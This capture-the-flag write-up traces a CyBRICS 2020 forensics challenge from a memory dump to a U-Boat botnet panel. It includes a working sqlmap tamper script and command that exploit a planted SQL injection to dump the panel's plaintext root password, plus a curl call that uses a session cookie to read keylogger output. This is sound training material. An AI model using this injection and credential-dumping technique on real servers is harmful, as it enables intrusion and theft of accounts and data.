Tags: reverse forensics sqli
Rating: 5.0
So, we have a memory dump. Let's spin up [volatility](https://github.com/volatilityfoundation/volatility)!
```bash
% python vol.py imageinfo -f ../20200724.mem
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/Users/ilyaluk/ctf/cybrics20/botmaster/20200724.mem)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x8276cc68L
Number of Processors : 2
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x8276dd00L
KPCR for CPU 1 : 0x807cc000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2020-07-24 15:44:22 UTC+0000
Image local date and time : 2020-07-24 18:44:22 +0300
% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem pstree
Volatility Foundation Volatility Framework 2.6.1
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000
0x843a4638:csrss.exe 308 288 9 419 2020-07-24 15:39:23 UTC+0000
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000
.. 0x84bf0b08:svchost.exe 812 456 20 469 2020-07-24 15:39:31 UTC+0000
... 0x84330508:audiodg.exe 960 812 6 131 2020-07-24 15:39:33 UTC+0000
.. 0x84c42b70:svchost.exe 1036 456 23 520 2020-07-24 15:39:34 UTC+0000
.. 0x84d00a48:svchost.exe 1436 456 24 381 2020-07-24 15:39:39 UTC+0000
.. 0x84cbf7e0:svchost.exe 1316 456 18 315 2020-07-24 15:39:37 UTC+0000
.. 0x84d943b8:svchost.exe 1836 456 5 98 2020-07-24 15:39:44 UTC+0000
.. 0x84e7f770:SearchIndexer. 2060 456 11 633 2020-07-24 15:39:59 UTC+0000
... 0x83f4fd28:SearchFilterHo 1732 2060 6 93 2020-07-24 15:43:25 UTC+0000
... 0x843ac030:SearchProtocol 2836 2060 7 278 2020-07-24 15:43:25 UTC+0000
.. 0x83f4b648:svchost.exe 2224 456 12 340 2020-07-24 15:41:46 UTC+0000
.. 0x84b82030:svchost.exe 564 456 11 360 2020-07-24 15:39:29 UTC+0000
... 0x83f72550:WmiPrvSE.exe 716 564 9 123 2020-07-24 15:41:49 UTC+0000
... 0x83fe2d28:WmiPrvSE.exe 3512 564 7 167 2020-07-24 15:42:40 UTC+0000
.. 0x84b98358:svchost.exe 692 456 8 275 2020-07-24 15:39:31 UTC+0000
.. 0x84d34978:taskhost.exe 1996 456 8 187 2020-07-24 15:39:45 UTC+0000
.. 0x84bf9c70:svchost.exe 844 456 19 397 2020-07-24 15:39:32 UTC+0000
... 0x84e25030:dwm.exe 924 844 3 67 2020-07-24 15:39:48 UTC+0000
.. 0x83f5e198:wmpnetwk.exe 284 456 13 435 2020-07-24 15:41:47 UTC+0000
.. 0x83efcac0:sppsvc.exe 336 456 4 144 2020-07-24 15:41:46 UTC+0000
... 0x84b13030:csrss.exe 344 336 8 236 2020-07-24 15:39:24 UTC+0000
.... 0x83fc5998:conhost.exe 2272 344 2 35 2020-07-24 15:44:21 UTC+0000
... 0x84b12418:winlogon.exe 380 336 5 137 2020-07-24 15:39:25 UTC+0000
.. 0x84bfebb8:svchost.exe 872 456 38 1060 2020-07-24 15:39:32 UTC+0000
... 0x83fee7b8:wuauclt.exe 3908 872 5 92 2020-07-24 15:42:55 UTC+0000
.. 0x84c60348:svchost.exe 1132 456 16 384 2020-07-24 15:39:35 UTC+0000
.. 0x84b8d470:VBoxService.ex 628 456 12 117 2020-07-24 15:39:30 UTC+0000
.. 0x84ca0030:spoolsv.exe 1272 456 12 296 2020-07-24 15:39:37 UTC+0000
. 0x84b4d030:lsass.exe 464 352 9 575 2020-07-24 15:39:26 UTC+0000
. 0x84b4e928:lsm.exe 472 352 11 146 2020-07-24 15:39:26 UTC+0000
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000
```
Huh, `bot.exe`. Seems suspicious. Let's dump the binary and take a look:
```bash
% python vol.py --profile=Win7SP1x86_23418 -f ../20200724.mem procdump -p 2444 -D dump
Volatility Foundation Volatility Framework 2.6.1
Process(V) ImageBase Name Result
---------- ---------- -------------------- ------
0x84e8e908 0x011d0000 bot.exe OK: executable.2444.exe
```
While skimming through the strings in this binary we stumble across something that seems like C&C server IP, some urls and HTTP implementation strings:
```
95.217.215.227
/gate
localhost
/UBoat/gate.php
X-Token
X-Id
POST
HTTP Response Code
%s %s HTTP/1.0
Content-Type: application/x-www-form-urlencoded
```
As it turns out this is an open-source botnet named [U-Boat](https://github.com/UBoat-Botnet/UBoat).
I ran a small [Dirb](https://tools.kali.org/web-applications/dirb) scan that yielded several pages, and most interesting one was `/login` (of course, that could be acheived through reading the [panel source code](https://github.com/UBoat-Botnet/UBoat-Panel) or pure guessing):
Oh, [download for my friends](http://95.217.215.227/Panel_for_friends.zip). How cool is that? Let's download this and check for diffs between it and latest version from the repo:
```
% diff -rupw UBoat-Panel Panel_for_friends
```
The most suspicous patch occurs around crafting some SQL query:
That looks like intentional SQL-injection. So, how to trigger it? This code handles heartbeats from bots. For instance, it is called from main `/gate` handler.
```php
$heart = $this->loadHelper('heartbeat');
$encrypted = $_POST['x'];
$key = getallheaders()['X-Token'];
$decrypted = $this->BoatDecryptionRoutine($encrypted, $key);
$commandData = null;
$commandType = null;
$commandId = $this->ParseCommand($decrypted, $commandData, $commandType);
$output = $this->CreateCommand(-1, -1, 'This will terminate the app.');
switch ($commandType) {
case 0:
//its a join
//handle the db incertion
$ip = null;
if (! empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (! empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$ip = $_SERVER['REMOTE_ADDR'];
}
$_dbcommand = $commandData;
$_dbcommand .= '@'.$ip;
$ip = $geo_helper->GetCountryFromAddress($ip);
$_dbcommand .= '@'.$ip['country_name'].'@'.$ip['country_code'];
$botId = $heart->beat($heart->splitToArray($_dbcommand));
$output = $this->CreateCommand(-1, 0, $botId);
break;
```
Simple encryption is utilized here:
```php
private function ParseCommand($rawData, &$data, &$commandType)
{
$splitInfo = explode('|', $rawData);
$data = urldecode($splitInfo[2]);
$commandType = (int) $splitInfo[1];
return (int) $splitInfo[0];
}
private function XORInputKey($input, $key, $inputLength, $keyLength)
{
$output = [];
for ($i = 0; $i < $inputLength; ++$i) {
$output[] = $input[$i] ^ $key[$i % $keyLength];
}
return $output;
}
//we'll use this xor shit kk
private function BoatDecryptionRoutine($input, $key)
{
$output = str_split(urldecode($input));
$key = str_split(urldecode($key));
$output = $this->XORInputKey($output, $key, count($output), count($key));
return implode($output);
}
```
Let's write a simple tamper script for sqlmap:
```python
import base64
def xor(data):
return ''.join(chr(ord(i) ^ ord('1')) for i in data)
def tamper(payload, **kwargs):
x = '0|0|{bbed3e02-0b41-11e3-8249-806e6f6e6963}@Microsoft Windows 8@Intel(R) Core(TM)@2.90GHz@NVIDIA GeForce GTX [email protected]@false@1' + payload
return xor(x)
```
From `src/uboat.sql` we know that password is stored in plaintext in `user` table of `uboat` DB. So, this should do the trick.
`% sqlmap -u 'http://95.217.215.227/gate' --headers='X-Token:1' --data "x=1" -p "x" --method POST --tamper tamper.py -D uboat -T user -C username,password --dump`
```
Database: uboat
Table: user
[1 entry]
+----------+-------------+
| username | password |
+----------+-------------+
| root | p@$$w0Rd123 |
+----------+-------------+
```
Neat, let's login to the dashboard:
Vurtualbox machine on Win7 looks like what we need. For some reason, I could not use U-Boat's UI for reading logs (right-click on bot → read logs), so let's poke around that using curl and using knowledge of panel source code:
```
% curl 'http://95.217.215.227/tasks/readLog' \
--data 'bot=57' \
-H 'Cookie: PHPSESSID=1c391ad1cc0663425b41b46c75db61db'
Left Windows
rnotepad[Enter]
cybrics{be_safe_from_bots}[Enter]
[Enter]
```
> `cybrics{be_safe_from_bots}`
